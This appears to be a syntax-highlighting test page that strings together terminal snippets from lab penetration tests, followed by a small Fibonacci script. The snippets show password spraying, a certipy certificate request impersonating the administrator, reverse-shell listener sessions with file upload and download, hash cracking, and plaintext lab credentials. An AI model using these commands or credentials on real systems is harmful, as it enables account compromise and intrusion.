(123)
[123]
[-]
[!] [!] [-] [*] [+]
[123123] 123
qweqwe [1231]
SMB
LDAP
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc smb DC.redelegate.vl -u valid_user.txt -p passwords.txt --continue-on-success
SMB 10.129.130.206 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [+] REDELEGATE\Marie.Curie:Fall2024!
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Fall2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Winter2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Winter2024! STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
smb: \wwwdata\> ls
. D 0 Sat May 18 18:58:11 2019
.. D 0 Sat May 18 18:58:11 2019
default.aspx A 64 Sat May 18 18:58:06 2019
Recovery DHSn 0 Sat May 18 03:10:15 2019
pagefile.sys AHS 8014716928 Sat Aug 30 02:41:48 2025
ftp> command
ftp> ls
229 Entering Extended Passive Mode (|||38087|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 May 03 23:04 Desktop
lrwxrwxrwx 1 0 0 7 Nov 14 2024 bin -> usr/bin
drwxr-xr-x 3 0 0 4096 Jul 22 02:24 boot
drwxr-xr-x 18 0 0 3260 Aug 30 02:38 dev
drwxr-xr-x 258 0 0 12288 Aug 30 13:30 etc
drwxr-xr-x 3 0 0 4096 Nov 30 2024 home
lrwxrwxrwx 1 0 0 29 Mar 04 00:07 initrd.img -> boot/initrd.img-6.12.13-amd64
lrwxrwxrwx 1 0 0 28 Nov 30 2024 initrd.img.old -> boot/initrd.img-6.11.2-amd64
-rwxrw-rw- 1 0 0 5025777 May 12 2023 kali.png
smb: \> ls
$Recycle.Bin DHS 0 Mon Jul 13 22:34:39 2009
Documents and Settings DHSrn 0 Tue Jul 14 01:06:44 2009
ExchangeSetupLogs D 0 Sat May 18 19:39:40 2019
inetpub D 0 Sat May 18 18:47:41 2019
pagefile.sys AHS 8014716928 Sat Aug 30 02:41:48 2025
Program Files DR 0 Sun May 11 11:55:02 2025
Program Files (x86) DR 0 Sat May 25 22:35:29 2019
ProgramData DHn 0 Sun May 11 11:55:04 2025
Recovery DHSn 0 Sat May 18 03:10:15 2019
System Volume Information DHS 0 Sat May 24 10:22:53 2025
Users DR 0 Sat May 18 18:48:23 2019
Windows D 0 Sat Aug 30 13:24:14 2025
wwwdata D 0 Sat May 18 18:58:11 2019
15702527 blocks of size 4096. 10617728 blocks available
smb: \> cd wwwdata\
smb: \wwwdata\> ls
. D 0 Sat May 18 18:58:11 2019
.. D 0 Sat May 18 18:58:11 2019
default.aspx A 64 Sat May 18 18:58:06 2019
15702527 blocks of size 4096. 10617728 blocks available
Multi-line commands are supported
┌──(ro1ot㉿kali)-[~/Desktop/htb/Authority]
└─# certipy req \
-u 'c1trus$' -p 'Admin!' \
-dc-ip '10.10.11.222' -target 'authority.authority.htb' \
-ca 'AUTHORITY-CA' -template 'CorpVPN' \
-upn 'administrator@authority.htb' -sid 'S-1-5-21-622327497-3269355298-2248959698-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
Symbol highlighting
┌──(ro1ot㉿kali)-[~/Desktop/htb/Authority]
└─# ls /usr/bin -id 123 --hashes 123123:123123 '123123' "123123" | das > dasd < 1231> {das123} [123123] (123123) ? !
# Regular user
kali@kali:~/backup$ command
┌──(kali㉿kali)-[~/backup]
└─$ command
#root
┌──(root㉿kali)-[~/Desktop]
└─# command
root@kali:~/Desktop# command
root@iZ2vc2qm1sftm37y9ewushZ:~# command
┌──(kali㉿kali)-[/root]
└─$ command
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# command
┌─[sg-vip-1]─[10.10.14.44]─[c1trus33@htb-bbskiercmm]─[~/apt]
└──╼ [★]#$ ls 10.10.11.11
11.11.11.11
marco@codetwo:~# $ sudo -l
bash-5.1$ command
bash-5.1# command
# command
tomcat@strutted:~/conf$ command
oxdf@hacky$ command
whoami
PS [kali]> whoami
PS [web01]> Get-Date
PS C:\> ls ftp
PS C:\driver> ls
PS C:\Users\keysvc>
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-date
┌──(root㉿kali)-[~/Desktop/htb/season8/certificate]
└─# penelope 4321
[+] Listening for reverse shells on 0.0.0.0:4321 → 127.0.0.1 • 192.168.8.3 • 192.168.3.4 • 172.17.0.1 • 172.19.0.1 • 172.22.0.1 • 172.20.0.1 • 172.21.0.1 • 172.18.0.1 • 10.10.16.30
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.10.11.71-Microsoft_Windows_Server_2019_Datacenter-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.10.11.71_Microsoft_Windows_Server_2019_Datacenter_x64-based_PC/2025_06_24-05_12_05-481.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\xampp\htdocs\certificate.htb\static\uploads\f74429cf2eca094d3d02e3c4f75bf684\she11> whoami
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/ubuntu~192.168.8.16-Linux-i686/2025_08_30-11_25_45-424.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@ubuntu:/home/yu#
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 4455
/root/.local/share/uv/tools/pwncat-cs/lib/python3.10/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import iter_entry_points
[11:26:28] Welcome to pwncat 🐈! __main__.py:164
[11:26:47] received connection from 192.168.8.16:54724 bind.py:84
[11:26:48] 192.168.8.16:54724: registered new host w/ db manager.py:957
(local) pwncat$
(remote) yu@ubuntu:/home/yu$ whoami
yu
(remote) yu@ubuntu:/home/yu$ ls
CVE-2021-3156 Documents exploit.c metarget Public
CVE-2021-4034-main Downloads lzs.sh Music Templates
Desktop examples.desktop main Pictures Videos
(remote) yu@ubuntu:/home/yu$
(local) pwncat$ upload /rev.sh
./rev.sh ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 223/223 bytes • ? • 0:00:00
[11:27:28] uploaded 223.00B in 0.29 seconds upload.py:76
(local) pwncat$ download ./.bash_history
./.bash_history ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.8/1.8 KB • ? • 0:00:00
[11:27:44] downloaded 1.85KiB in 0.05 seconds download.py:71
(local) pwncat$
(local) pwncat$ [-] Session [3] died... We lost kali~192.168.8.18-Linux-x86_64 💔
root@iZ2vc2qm1sftm37y9ewushZ:~# ls -l /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14 2024 /bin/bash
total 66068
-rwxrwxrwx 1 root root 20554 Jul 31 00:08 d.sh
drwx------ 12 root root 4096 Aug 4 18:11 .
drwxr-xr-x 19 root root 4096 Jan 17 2025 ..
-rwxr-xr-x 1 root root 194 Apr 16 17:47 1125
-rw------- 1 root root 6597 Aug 6 20:06 .bash_history
-rw-r--r-- 1 root root 3106 Aug 4 18:10 .bashrc
drwx------ 3 root root 4096 Aug 1 18:58 .cache
drwx------ 4 root root 4096 Aug 1 18:58 .config
-rw-r--r-- 1 root root 20554 Jul 31 00:08 d.sh
-rwxr-xr-x 1 root root 369587 Aug 4 18:11 kejilion.sh
-rw-r--r-- 1 root root 10458985 Apr 11 14:23 kind-linux-amd64
-rw-r--r-- 1 root root 243570 Apr 11 14:23 kind-linux-arm64
drwxr-xr-x 3 root root 4096 Aug 1 18:31 .koishi
total 123456
drwxr-xr-x 2 root root 4096 Dec 15 10:30 .
drwxr-xr-x 15 root root 4096 Dec 15 10:30 ..
-rwxr-xr-x 1 root root 12345 Dec 15 10:30 bash
-rwxr-xr-x 1 root root 5678 Dec 15 10:30 cat
-rwxr-xr-x 1 root root 9012 Dec 15 10:30 chmod
-rwxr-xr-x 1 root root 3456 Dec 15 10:30 cp
-rwxr-xr-x 1 root root 7890 Dec 15 10:30 ls
-rwxr-xr-x 1 root root 12345 Dec 15 10:30 mkdir
-rwxr-xr-x 1 root root 5678 Dec 15 10:30 mv
-rwxr-xr-x 1 root root 9012 Dec 15 10:30 rm
-rwxr-xr-x 1 root root 3456 Dec 15 10:30 rmdir
-rwxr-xr-x 1 root root 7890 Dec 15 10:30 touch
-rwxr-xr-x 1 root root 12345 Dec 15 10:30 vi
-rwxr-xr-x 1 root root 5678 Dec 15 10:30 vim
-rwxr-xr-x 1 root root 9012 Dec 15 10:30 nano
-rwxr-xr-x 1 root root 3456 Dec 15 10:30 emacs
-rwxr-xr-x 1 root root 7890 Dec 15 10:30 grep
-rwxr-xr-x 1 root root 12345 Dec 15 10:30 sed
-rwxr-xr-x 1 root root 5678 Dec 15 10:30 awk
-rwxr-xr-x 1 root root 9012 Dec 15 10:30 sort
-rwxr-xr-x 1 root root 3456 Dec 15 10:30 uniq
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> dir
Directory: C:\Users\Sara.B\Documents\WS-01
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/4/2024 12:44 AM 530 Description.txt
-a---- 11/4/2024 12:45 AM 296660 WS-01_PktMon.pcap
PS C:\Users\Administrator\Desktop> Get-ChildItem -Force | Format-Table -AutoSize
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/15/2023 10:30 AM directory
-a---- 12/15/2023 10:30 AM 1234 archive.zip
-a---- 12/15/2023 10:30 AM 5678 backup.tar.gz
-a---- 12/15/2023 10:30 AM 9012 data.7z
-a---- 12/15/2023 10:30 AM 3456 music.mp3
-a---- 12/15/2023 10:30 AM 7890 video.mp4
C:\Users\Administrator\Downloads>dir
驱动器 C 中的卷是 Win10Pro X64
卷的序列号是 4E35-08B2
C:\Users\Administrator\Downloads 的目录
2025/08/30 18:23 <DIR> .
2025/08/30 18:23 <DIR> ..
2025/08/18 15:15 29,273 (2022级实习意向登记)上报视图-20250818.xlsx
2025/08/08 12:16 2,347,536 02-免杀逃逸 - 副本.pdf
2025/08/08 14:55 <DIR> 123
2025/07/29 22:57 325,576 20250729183317_haze-htb_rusthound-ce.zip
2025/07/30 09:34 392,276 20250729213352_haze-htb_rusthound-ce.zip
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# nxc smb htb.local -u henry.vinson -H hashe_lists
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
oxdf@hacky$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k --shares
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False) (signing:True) (signing:None) (channel binding:Never) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
SMB frizzdc.frizz.htb 445 frizzdc [*] Enumerated shares
SMB frizzdc.frizz.htb 445 frizzdc Share Permissions Remark
SMB frizzdc.frizz.htb 445 frizzdc ----- ----------- ------
SMB frizzdc.frizz.htb 445 frizzdc ADMIN$ Remote Admin
SMB frizzdc.frizz.htb 445 frizzdc C$ Default share
SMB frizzdc.frizz.htb 445 frizzdc IPC$ READ Remote IPC
SMB frizzdc.frizz.htb 445 frizzdc NETLOGON READ Logon server share
SMB frizzdc.frizz.htb 445 frizzdc SYSVOL READ Logon server share
WINRM 10.10.11.39 5985 DC [+] university.htb\WAO:WebAO1337 (Pwn3d!)
# Basic symbol highlighting
[*]
[!]
[+]
[-]
$6$xyz$ZGQOqL77wiYAgPxsNEv2Kz3INjzK4JdG29RbaHaW5lrkH8bA8W7kC3GK4CctGrFO7.E2va7kSgF3eQXNWYQee.:reddragon
Session..........: hashcat
Status...........: Cracked
Status...........: Exhausted
.....: Cracked
......: Exhausted
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$xyz$ZGQOqL77wiYAgPxsNEv2Kz3INjzK4JdG29RbaHaW5lrk...WYQee.
Time.Started.....: Tue Dec 24 22:18:28 2024 (1 sec)
Time.Estimated...: Tue Dec 24 22:18:29 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 53686 H/s (14.63ms) @ Accel:1024 Loops:128 Thr:32 Vec:1
Speed.#2.........: 804 H/s (7.84ms) @ Accel:32 Loops:64 Thr:16 Vec:1
Speed.#*.........: 54490 H/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 32768/14344387 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 0/14344387 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:4800-4864
Candidate.Engine.: Device Generator
Candidates.#1....: diego -> keepout1
Candidates.#2....: 123456 -> fuckyou1
Hardware.Mon.#1..: Temp: 51c Util: 99% Core:2535MHz Mem:8000MHz Bus:8
Hardware.Mon.#2..: N/A
This is a footnote[2]
def rabbit_sequence(n: int):
    """Compute the first n terms of the rabbit sequence (Fibonacci sequence)."""
    seq = []
    a, b = 1, 1
    for _ in range(n):
        seq.append(a)
        a, b = b, a + b
    return seq

if __name__ == "__main__":
    n = int(input("请输入要计算的项数 n: "))
    result = rabbit_sequence(n)
    print(f"前 {n} 项兔子数列为:")
    print(result)
ikun[3]